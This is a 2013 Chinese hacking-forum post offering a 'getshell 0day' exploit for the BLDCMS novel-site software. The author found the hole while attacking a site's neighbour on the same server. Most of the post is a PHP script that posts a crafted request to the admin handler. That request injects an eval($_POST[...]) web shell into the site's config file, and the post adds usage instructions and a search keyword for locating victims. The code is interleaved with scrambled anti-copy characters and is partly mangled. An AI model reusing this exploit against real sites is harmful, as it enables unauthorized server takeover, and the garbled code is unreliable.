找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2293|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
* ^$ h6 |+ D! M6 v2 g: C; @5 C
: T  S3 g1 e1 h 1 i3 l. F% u. [
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
! K2 p. V$ z8 R' w& b) F2 T7 Y7 k
2 i* V4 X7 y8 U6 c; c既然都有人发了 我就把我之前写好的EXP放出来吧3 ]2 `! z% Q" [

2 B  Y* F6 R* }5 q3 l3 d; S. v* O- Gview source print?01.php;">
1 g- ?2 {9 h2 L6 X1 O02.<!--?php! }. D, y4 \5 J* h0 D4 M3 k% h# _" g
03.echo "-------------------------------------------------------------------
* q8 V3 _/ v' B2 p04. + Y6 `9 r5 n- n/ x  `
05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
. v/ y5 b) k* L5 M. v0 a06.
" j) H" E9 f' v1 v  X07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
: m) m  P' k3 W7 Y08.
9 m6 h5 R& y* \7 B* n5 `09.QQ:981009941\r\n                                2013.3.21\r\n            
8 E+ F( ^; L. m' l. j10.
7 P7 J- J+ S, X6 `: D) a11. 4 ], I) }* }, H
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码% s) ?3 Q2 r3 Q- x* m
13. % s' w& f1 g, ?; P8 ?
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------
' {. }; Q6 T; R8 s) P+ v0 e! T15.
9 [) u7 }. {1 a/ f; k) Z/ [( b16.--------------------------------------------------------------------\r\n";; l# b+ L7 G; W% w
17.$url=$argv[1];
9 j0 c4 x- P% |# K18.$dir=$argv[2];" F3 h/ S8 `/ i0 `! n7 S
19.$pass=$argv[3];! d3 i& n- J( }" i( `$ u) p2 W
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';& J2 i. `' W+ G) y, A
21.if (emptyempty($pass)||emptyempty($url))
5 {( T$ G' x7 B. ~22.{exit("请输入参数");}
7 q" {) b& t, Q23.else) a) D. G2 u8 ?. h/ [
24.{
8 T3 F7 K' E$ L! E; ]25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
) g( @/ _6 P# N" c1 Y' r26. " P" Z8 J6 p6 `3 l7 b4 b5 j1 `
27.al;4 t/ N* \' E2 E' ?1 p
28.$length = strlen($fuckdata);
6 C$ b$ N) Q6 a29.function getshell($url,$pass), W- ]/ `* S& f1 `0 u! c0 B
30.{
  o" O. L' k( O) t7 R- _* `31.global $url,$dir,$pass,$eval,$length,$fuckdata;4 A8 g! D0 o6 D+ w# t* k
32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";9 k! b5 A! M% D2 P/ y
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
; T1 a2 y( X* W, \2 g# s! \7 Q34.$header .= "User-Agent: MSIE\r\n";* V0 t4 R' Q9 q8 F& h* E: L5 z$ t
35.$header .= "Host:".$url."\r\n";* i) q) o( ]0 M7 s' {
36.$header .= "Content-Length: ".$length."\r\n";# X! v4 Y: G5 O
37.$header .= "Connection: Close\r\n";/ ?$ n" K, P) p) |( m- I
38.$header .="\r\n";
. Y2 T, q( p) V- h4 K39.$header .= $fuckdata."\r\n\r\n";
$ S" L& m9 V1 v" ~40.$fp = fsockopen($url, 80,$errno,$errstr,15);) w0 o" F/ V4 q" @! O, w+ V
41.if (!$fp)8 ~0 j7 M: V/ p; u7 I, b
42.{
/ }6 l  e# F- F5 D8 `, @/ ^; ?43.exit ("利用失败:请检查指定目标是否能正常打开");4 T; e+ ^0 x3 C  i: Y( \
44.}; T* E$ E1 O- M$ r) \, W  X3 z
45.else{ if (!fputs($fp,$header))$ G! w9 F7 ]( a
46.{exit ("利用失败");}, j3 q, v! G. g7 I- }1 C7 i
47.else3 k. G9 c1 k3 L1 m+ N8 g3 b
48.{
' v" L6 R. ~% s, g$ b49.$receive = '';
2 m  {2 t0 x5 _6 Q: y% S6 B50.while (!feof($fp)) {3 {1 j0 G" g4 E' P! \% f- @
51.$receive .= @fgets($fp, 1000);7 ^  W8 D: p/ {$ R- n* c  g# ]$ \& y
52.}
) a" {( [. T* s  R3 C53.@fclose($fp);( K0 A: `, M; ]
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标
9 w  H8 J" w. p# ]0 G55.
# W5 q. p/ q8 z, q9 A2 ^56.GPC是否=off)";, D1 n- k! e" `! K4 \. @
57.}}
% h/ b# ~( ~" [: D6 ~  I58.}
) U" E1 u, N) ^5 U. R, X59.}
1 Q8 L+ K4 j# a; [6 Z' P  O60.getshell($url,$pass);
& ?  R$ M) R- |3 h: Z; |5 I; u61.?-->5 C4 n# i+ y% [  ^2 s9 A
! B# a- J7 K" |6 s

+ ~2 `0 Q/ b2 ]' w  R6 B- ^5 ]$ X, w6 c0 N ) p4 b: X" i* j( W7 U- ?8 f" m
by 数据流- @* _  x3 F2 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表